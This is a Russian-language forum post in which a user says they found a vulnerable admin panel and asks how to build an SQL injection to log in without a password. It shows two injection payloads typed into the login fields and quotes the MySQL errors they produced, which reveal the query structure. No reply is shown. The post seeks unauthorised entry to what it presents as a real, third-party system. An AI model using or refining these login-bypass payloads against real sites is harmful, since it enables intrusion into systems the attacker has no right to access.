23.01.2014, 13:53
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Подскажите пожалуйста по вопросу sql inj. Нашел уязвимую админку, хочу создать запрос для проникновения без пароля.
Есть 2 поля: Логин и Пароль
В поле username ввожу '1
В поле password ввожу '2
На что выдает мне:
DB Error: syntax error
SELECT NAME, PASSWORD FROM USER WHERE NAME = ''1' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND state = '0'' at line 2]
Далее пробую вставить запрос такого вида в поле username
admin' or '1'='1' AND password='' or '1'='1'
На что выдает следующее:
DB Error: syntax error
SELECT NAME, PASSWORD FROM USER WHERE NAME = 'admin' or '1'='1' AND password='' or '1'='1'' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 2]
Как правильно составить запрос?
|
|
|